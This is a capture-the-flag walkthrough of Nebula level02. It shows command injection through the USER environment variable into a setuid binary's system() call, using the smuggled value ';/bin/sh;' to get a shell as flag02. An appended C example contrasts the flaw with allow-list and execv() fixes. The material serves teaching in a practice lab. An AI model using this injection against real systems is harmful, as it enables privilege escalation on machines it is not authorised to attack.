Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:

We start by SSH'ing in as level02 and checking out the /home/flag02 directory:

level02@nebula:~$ cd /home/flag02/
level02@nebula:/home/flag02$ ls -lah
total 13K
drwxr-x--- 2 flag02 level02   80 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag02 flag02   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag02 flag02  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag02 level02 7.3K 2011-11-20 21:22 flag02
-rw-r--r-- 1 flag02 flag02   675 2011-05-18 02:54 .profile

We examine the code and run the flag02 file:

level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo level02 is cool")
level02 is cool

As expected, the file echoes the current user name and says that we are cool :)

However, just like in level01, there are still some issues in this code. The programmer did not consider that the input could be attacker-controlled.

In this example, asprintf builds the command string from the value of getenv("USER"), which is then passed straight to system(). Let's see what is currently located in that variable:

level02@nebula:/home/flag02$ echo $USER

The value is currently "level02". What happens if we update it to something else? Say, "geoda" for example:

level02@nebula:/home/flag02$ export USER=geoda
level02@nebula:/home/flag02$ echo $USER
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo geoda is cool")
geoda is cool

As expected, we have updated the $USER variable to "geoda" instead of the current user "level02". When we run the file, it will print "geoda" instead.

Now, how do we exploit this further?

Well, since system() hands the string to /bin/sh, we can terminate the echo command with a semicolon and have the shell run a second command: a system shell.

To do this, we update our $USER variable with the following ";/bin/sh;":

level02@nebula:/home/flag02$ echo $USER
level02@nebula:/home/flag02$ export USER=";/bin/sh;"
level02@nebula:/home/flag02$ echo $USER

Now, when we execute ./flag02, the shell parses the string as three commands: /bin/echo with no arguments (which prints an empty line), then /bin/sh, and finally "is cool" once the shell exits. So instead of printing ";/bin/sh; is cool", the first semicolon closes the echo statement and /bin/sh is started with flag02's privileges:

level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo ;/bin/sh; is cool")

sh-4.2$ id
uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02)
sh-4.2$ getflag
You have successfully executed getflag on a target account
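To show the defensive side of this, here is an added example (not the Nebula source and not the author's code) that reconstructs the pattern described above, an asprintf-built command handed to system(), beside two fixes: an allow-list check on the USER value and an execv() call with an explicit argv array so that no shell ever parses the string. The function names and the allow-list rule are assumptions for illustration; it targets glibc on Linux.

```c
/* Added example: the command-injection pattern from the level02 writeup
 * (reconstructed, not the original binary) next to a hardened form.
 * Assumes glibc/Linux for asprintf(). */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern: the command line is assembled from an
 * attacker-controlled value (getenv("USER") in the real binary) and
 * passed to system(), i.e. to "/bin/sh -c". Any shell metacharacter
 * in it is honoured. Returns the string system() would receive;
 * the caller frees it. */
char *build_vulnerable_command(const char *user)
{
    char *buffer = NULL;
    if (asprintf(&buffer, "/bin/echo %s is cool", user) < 0)
        return NULL;
    return buffer;
}

/* Allow-list check (illustrative rule): accept only [A-Za-z0-9_-],
 * 1..32 bytes. Returns 1 if acceptable, 0 otherwise. Rejecting
 * anything outside the allow-list is simpler and safer than trying to
 * escape individual shell metacharacters. */
int is_safe_username(const char *user)
{
    if (user == NULL || *user == '\0' || strlen(user) > 32)
        return 0;
    for (const char *p = user; *p; p++) {
        if (!((*p >= 'a' && *p <= 'z') || (*p >= 'A' && *p <= 'Z') ||
              (*p >= '0' && *p <= '9') || *p == '_' || *p == '-'))
            return 0;
    }
    return 1;
}

/* Hardened pattern: execv() with an explicit argv array. No shell is
 * involved, so ";" "|" "$(...)" in the name are just bytes of one
 * argument to /bin/echo. Returns the child's exit status, or -1 on
 * error. (A real setuid program should also drop privileges and
 * sanitise the environment before doing this.) */
int echo_without_shell(const char *user)
{
    char *argv[] = { "/bin/echo", (char *)user, "is", "cool", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);               /* only reached if execv() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: the benign value and the one from the writeup. */
    const char *inputs[] = { "level02", ";/bin/sh;" };
    for (size_t i = 0; i < 2; i++) {
        char *cmd = build_vulnerable_command(inputs[i]);
        printf("system() would receive: %s\n", cmd);
        printf("allow-list accepts \"%s\": %s\n", inputs[i],
               is_safe_username(inputs[i]) ? "yes" : "no");
        /* Even the hostile value is harmless here: echo prints it literally. */
        echo_without_shell(inputs[i]);
        free(cmd);
    }
    return 0;
}
```

Running it prints the exact string the vulnerable version would hand to /bin/sh for each input, shows the allow-list rejecting ";/bin/sh;", and then prints ";/bin/sh; is cool" as plain text, because execv() passes the value as a single argument and nothing ever interprets the semicolons.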


The next post will be level03.

Thanks for reading!